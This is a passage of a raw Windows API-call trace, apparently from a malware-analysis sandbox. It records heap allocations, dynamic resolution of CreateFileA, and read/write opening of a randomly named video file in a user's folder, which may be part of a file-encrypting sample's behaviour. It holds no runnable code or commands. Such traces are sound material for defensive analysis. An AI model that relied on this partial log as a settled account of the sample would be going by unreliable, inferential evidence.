lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0042.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0042.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0042.926] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.926] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0042.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0042.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0042.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.927] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.927] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0042.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0042.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.928] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0042.928] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0042.929] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.929] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0042.929] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.930] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0042.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.931] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0042.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0042.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x8898c8 [0042.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x8898c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0042.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.931] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0042.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.931] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0042.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0042.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x8898c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0042.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.932] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0042.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0042.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.932] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0042.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0042.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0042.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.932] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0042.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv", cchWideChar=66, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 66 [0042.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x42) returned 0x88e138 [0042.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv", cchWideChar=66, lpMultiByteStr=0x88e138, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv", lpUsedDefaultChar=0x0) returned 66 [0042.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e138 | out: hHeap=0x770000) returned 1 [0042.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0042.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0042.933] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.933] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ejdsspxab.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0042.933] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0042.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=66, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 66 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x84) returned 0x7bbc00 [0042.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=66, lpWideCharStr=0x7bbc00, cchWideChar=66 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\ejDsspxAB.mkv") returned 66 [0042.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0042.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7bbc00 | out: hHeap=0x770000) returned 1 [0042.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0042.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.934] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0042.935] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0042.935] HeapFree 